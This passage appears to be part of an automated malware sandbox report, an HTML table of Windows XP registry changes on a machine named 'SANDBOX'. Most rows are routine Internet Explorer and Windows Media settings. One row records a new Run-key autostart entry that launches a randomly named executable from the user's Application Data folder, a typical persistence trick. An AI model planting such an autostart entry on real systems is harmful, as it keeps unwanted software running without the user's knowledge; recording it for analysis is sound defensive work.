<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000000c</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000009</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections</span></td>
<td><span style="color: black; font-size: xx-small;">SavedLegacySettings</span></td>
<td><span style="color: black; font-size: xx-small;">hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Run</span></td>
<td><span style="color: black; font-size: xx-small;">Orimdie</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlots</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,ff,ff,ff,ff,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlot</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td><span style="color: black; font-size: xx-small;">FolderType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MyDocuments"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@explorer.exe,-7004</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Opens your Internet browser."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12704</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Internet P&roperties"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@C:\WINDOWS\system32\ieframe.dll.mui,-39229</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Browse Without &Add-ons"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12705</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"&Browse the Internet"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Internet Explorer\iexplore.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Internet Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000005</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000088</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000009d</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12704</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Internet P&roperties"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@C:\WINDOWS\system32\ieframe.dll.mui,-39229</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Browse Without &Add-ons"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12705</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"&Browse the Internet"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Internet Explorer\iexplore.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Internet Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@xpsp1res.dll,-11005</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sends and receives e-mail and newsgroup messages."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Wireshark\wireshark.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Wireshark"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Common Files\Java\Java Update\jucheck.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java(TM) Update Checker"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\setup_wm.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Microsoft Windows Media Configuration Utility"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\taskmgr.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows TaskManager"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@xpsp3res.dll,-20000</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Network Diagnostics for Windows XP"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12691</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"My Recent Documents"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@C:\WINDOWS\system32\SHELL32.dll,-9217</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"My Network Places"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\inf\unregmp2.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Microsoft Windows Media Player Setup Utility"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\wmplayer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">UniqueID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">ComputerName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"SANDBOX"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">VolumeSerialNumber</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:20d334b5</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">LocalBase</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">DTDFile</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">LocalDelta</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">RemoteDelta</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmplayer.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
